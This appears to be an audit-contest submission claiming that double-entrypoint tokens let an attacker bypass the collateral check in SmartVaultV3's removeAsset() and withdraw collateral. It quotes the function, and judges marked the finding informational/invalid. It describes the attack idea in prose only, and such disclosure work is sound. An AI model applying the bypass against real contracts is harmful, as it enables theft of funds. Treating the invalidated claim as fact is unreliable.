If accepted token is double-entrypoint token, attacker can bypass `canRemoveCollateral` checking and withdraw all token
Summary
If accepted token is double entry point token, attacker can bypass checking condition at SmartVaultV3#removeAsset() function and withdraw all collateral
Vulnerability Details
function SmartVaultV3#removeAsset() allow user to withdraw assets:
function removeAsset(address _tokenAddr, uint256 _amount, address _to) external onlyOwner {
ITokenManager.Token memory token = getTokenManager().getTokenIfExists(_tokenAddr);
if (token.addr == _tokenAddr) require(canRemoveCollateral(token, _amount), UNDER_COLL); // <----
IERC20(_tokenAddr).safeTransfer(_to, _amount);
emit AssetRemoved(_tokenAddr, _amount, _to);
}
If token is added to accepted token list, which mean it is accepted to be collateral in vault, it must pass checking condition of canRemoveCollateral function. Problem raised when collateral is double-entrypoint token. This type of token have two separate addresses are used to interact with the same token, which resulted in vulnerability when integrated into Compound. Attacker can use this token to deposit to vault and mint EUROs, and withdraw all of them
Impact
Attacker can mint any EUROs token as he want without collateral needed.
Tools Used
Manual review
Recommendations
When withdraw assets, balance of all accepted token should be checked.
Lead Judging Commences
informational/invalid
informational/invalid
Prize pool breakdown
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.